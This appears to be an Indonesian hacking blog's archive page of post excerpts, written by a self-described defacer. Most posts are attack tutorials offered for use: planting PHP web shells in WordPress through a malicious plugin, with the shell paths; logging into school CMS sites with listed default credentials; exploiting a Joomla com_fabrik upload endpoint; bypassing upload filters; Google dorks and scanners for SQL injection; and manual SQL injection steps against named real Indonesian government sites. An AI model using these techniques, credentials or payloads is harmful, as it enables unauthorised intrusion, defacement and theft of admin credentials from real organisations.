Postingan

Menampilkan postingan dari Februari, 2018

KUMPULAN FREE WEB HOSTING

Gambar
    hay gaes jumpa lagi dengan saya kali ini saya akan membagikan beberapa alamat web yang hostingnya nya free ( GRATIS ) langsung saja ya cekidot :v .:: FREE WEB HOSTING ::. ● https://clients.vimlyhost.net/signup ● https://www.heliohost.org/signup/ ● http://www.uhostall.com/signup.php ● http://hostfree.pw/free-signup.php ● https://freeded.com/free-hosting.php ● https://www.freehosting.network/cart.php?a=add&pid=1 ● http://info8-hosting.info/free-hosting-signup.php?i=1 ● http://www.ultimatefreehost.in/signup.php ● http://www.jesihost.com/free-hosting.php ● https://hostkda.com/details-features/ ● http://www.rocketnesia.host/daftar/ ● https://joshwho.website/signupform.php ● https://www.247zilla.com/free-cloud-hosting.html ● https://www.fnhost.org/ ● https://www.freehosting.io/hosting ● http://www.advancedfreeweb.com/free-hosting-signup.html ● https://dashboard.viewen.com/cart.php ● https://hostinfree.com/ ● http://cloudcreativ.com/ ● https://www.digitalberg.com/free-ssd-web-hosting-

TANAM SHELL DI WORDPRESS MENGGUNAKAN PLUGINS

Gambar
  hello assalamualaikum wr wb ketemu lagi dengan saya sekian lama vakum nge-blog karena terlalu sibuk dengan real life kawan wkwkwk kali ini saya akan berbagi tutorial tentang MENANAM SHELL DI WORDPRESS MELALUI PLUGINS , langsung saja cekidot download dulu plugins nya disini . extensi .zip tidak perlu di extract http://www51.zippyshare.com/v/v2WpyMPr/file.html 1. ( WAJIB ) kita sudah masuk ke dashboard Admin WordPress nya .     langsung saja kita klik tulisan plugins di bagian kiri lalu add plugins setelah itu klik add new  klik upload plugins masukin plugins yang sudah di download tadi , cry.zip dan tekan install now tunggu hingga muncul tulisan plugin installed sucessfully nah done :) kita tinggal memanggil shell kita cyberscry shell              >           /wp-content/plugins/cry/ cyberscry mini shell       >            /wp-content/plugins/cry/mini.phtml IndoXploit v.3 shell          >            /wp-content/plugins/cry/idx3.php  password shell cyberscry shell maupun IndoX

Deface Dengan Default Member CMS Balitbang

Gambar
Tutorial Deface Web Metode Default Member CMS Balitbang   Mr.X98 Dork : intext:Website engine's code is copyright © 2013 Tim Balitbang Depdiknas versi 3.5   inurl:"/html/guru.php?id=" inurl:"/html/siswa.php?id=" Kembangin lagi sendiri :P Exploitasi url target menjadi alamatkorban.sch.id /member atau /users Gunakan salah satu default user dibawah ini untuk login : USERNAME     PASSWORD     DETAILS     SHELL UPLOAD alan                    123456               guru              available kickdody            123456               guru              available siswanto             123456               guru              available choirulyogya      123456               guru              available wardjana            123456               guru              available taufik                  123456               guru              available tomi                    123456               guru              available alumni                123456               siswa             n

Cara Deface Com_Fabrik with htaccess

Gambar
Hello Bertemu Lagi Dengan Saya kali ini saya akan memberikan tutorial cara deface web metode com_fabrik Oke langsung saja ya :v -Bahan Bahan yang di butuhkan adalah - Dork Com_Fabrik inurl:index.php?option=com_fabrik inurl:index.php/component/fabrik/ site:go.id inurl:index.php?option=com_fabrik&view= site:go.id inurl:importcsv.php site:go.id (site nya bisa di ganti selain go.id / dork bisa di kembangin sendiri )   - Csrf Com_Fabrik KLIK  me - File .htaccess Touch Me beb - Script Deface Pasti Udah Pada Punya :v - Exploit /index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload - Live Target: http://pn-maros.go.id langsung saja ke tutorial nya 1) Dorking Seperti Biasa cari site yang kira kira vlun 2) Kalau dah dapet masukan exploit nya contoh "http://pn-maros.go.id/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload"  Kal

MELIHAT DIRECTORY SHELL YANG TIDAK BISA DI VIEW PADA GAMBAR

Gambar
MELIHAT DIRECTORY SHELL YANG TIDAK BISA DI VIEW PADA GAMBAR                    hai kali ini saya akan share cara melihat directory shell yang sudah tertanam pada gambar . tapi kita tidak dapet memanggil shell nya / view images nya . jadi kita harus mencari tahu tempat directory shell nya tertanam di mana . nah langsung saja kali ini saya menggunakan 2 cara ,  1. INSPECT ELEMENT cara nya :        arahkan cursor kita ke gambar taneman shell kita      klik kanan      pilih inspect element        setelah itu kita langsung cari nama atau ekstensi file kita , contoh saya tadi menanam file mini.phtml , langsung saja kita search nah langsung ketemu kan :) 2. VIEW SOURCE     caranya :  kita tekan " ctrl + U " di keyboard kita  atau dengan cara lain menambahkan tulisan " view-source: " sebelum url di gambar shell kita, contoh view-source:http://www.#######.com/admin/edit.php?id=179 maka  kita tulis mejadi view-source: http://www.#######.com/admin/edit.php?id=179 maka hasiln

Fresh Google Dorks 2018 for SQLi

Gambar
 singkat saja langsung klik di bawah gan :v  sengaja w masukin pastebin biar bisa di download juga ^_^   klik dimari euy :v tools google dorking vuln sqli android scan Db SQLi with Droid SQLi source : https://www.nextleveltricks.com/latest-google-dorks-list/

SCAN Database SQL injection with Droid SQLi ( android )

Gambar
SCAN Database SQL injection with Droid SQLi ( android ) assalamualaikum wr.wb hai sobat ketemu lagi dengan saya,  kali ini saya akan share tools SQLi scanner database menggunakan Droid SQLi nah pertama kita siapin alat tempur nya dulu yaitu Droid SQLi bisa kalian download di bawah ini > disini <  ( jika link mati bisa di cari di google ) > Dork SQLi fresh 2018 <   > tools google dorking vuln sqli android <  langsung saja kita download dan install aplikasi nya , aplikasi nya seperti di gambar kita buka saja langsung aplikasi nya , caranya masukin web target ke kolom dan tekan inject live target http://www.tunesoman.com/product.php?id=200 tunggu hingga muncul database web nya seperti pada gambar , jika tidak muncul berarti web tersebut tidak bisa di inject tinggal kita masuk folder folder nya untuk mencari username dan password admin login nah ketemu kan username dan password login admin nya , tinggal kita mencari dashboard login admin nya, bisa manual mencari atau menc

TAMPER DATA UNTUK UPLOAD SHELL ADDS ON FIREFOX

Gambar
selamat pagi siang sore malem gan :v assalamualaikum wr.wb.           saya akan membagikan sedikit tutorial upload shell menggunakan tamper data . tamper data ini adalah salah satu adds on dari firefox . penggunaan untuk defacer sebagai mengubah ekstensi file yang di upload ( shell backdoor ) dari ekstensi jpg/png/gif menjadi php . kita menggunakan tamper data karena server web tidak menerima upload php/phtml tetapi masih menerima upload jpg/png/gif . maka 90% kita bisa menggunakan tamper data ini untuk upload shell siapkan adds on fire fox terlebih dahulu di bawah ini ( hanya untuk firefox versi lama , firefox quantum tidak kompatible jadi tidak bisa memakai nya ) https://addons.mozilla.org/en-US/firefox/addon/tamper-data/ langsung kita tekan add to firefox dan kita install setelah kita install nanti muncul notifikasi restart firefox . tutup firefox nya,  kita buka ulang lagi firefox nya , kita ke uploader shell nya . kita pilih shell kita yang ber ekstensi php.jpg nah tapi jangan kli

TOOLS GOOGLE DORKING VULN SQLi ANDROID

Gambar
TOOLS GOOGLE DORKING VULN SQLi ANDROID MEMAKAI SEQUEL EYE assalamualaikum wr.wb hai sobat jumpa lagi dengan saya . kali ini saya akan share tools google dorking SQLi di android menggunakan aplikasi " Sequel Eye " nah kita download aplikasi nya disini click here kalau link mati bisa search di google "Sequel Eye" download dan kalian install ya gan kayak gini aplikasi nya setelah itu kita buka aplikasi nya , tekan accept . setelah itu kita pergi ke pengaturan di bagian kanan atas aplikasi pilih google dork mode , atur juga number of website ( website yang akan di tampilkan setelah scan ) . isi sesuai kebutuhan anda saja . kalau saya sih saya isi 10 aja biar ga banyak banyak . connection time out di isi default saja tidak apa apa setelah kita menyeting aplikasi nya . kita tinggal pakai gan . cara makai nya kita tinggal masukin dork SQLi yang kita punya ke dalam mesin pencarian dan tekan START TASK seperti gambar di atas yang vuln yang muncul unsecure yang warna mera

SQLi with DIOS by cyberscry

Gambar
tutorial SQLi manual with DIOS v.2 Maaf jika Live Target Kami Web .Id . saya buat sebagai live karena dulu udah pernah saya deface dan saya laporin bug nya tapi admin biasa aja soal itu tidak di path . sedangkan saya masih kurang faham soal path nya :v Dork : inurl:.php?id= site: ( kembangin ) live : http://pa-palu.go.id/profil/detailhakim.php?id=3 pertama cek web nya vuln SQLi apa tidak dengan cara menambahkan string ( ' ) di belakang angka , jika vuln maka akan muncul error seperti gambar ini setelah tahu itu vuln SQLi , kita mencari jumlah column yang error untuk mengetahui table nya Dengan , " order by " tambah kan +order+by+1--+ di belakang url web yang sudah di beri string ( ' )  jika tampilan kembali normal maka di lanjut angka 2 dan seterusnya sampai error seperti ini : http://pa-palu.go.id/profil/detailhakim.php?id=3'+order+by+1--+            [ Normal ] http://pa-palu.go.id/profil/detailhakim.php?id=3'+order+by+2--+            [ Normal ] http: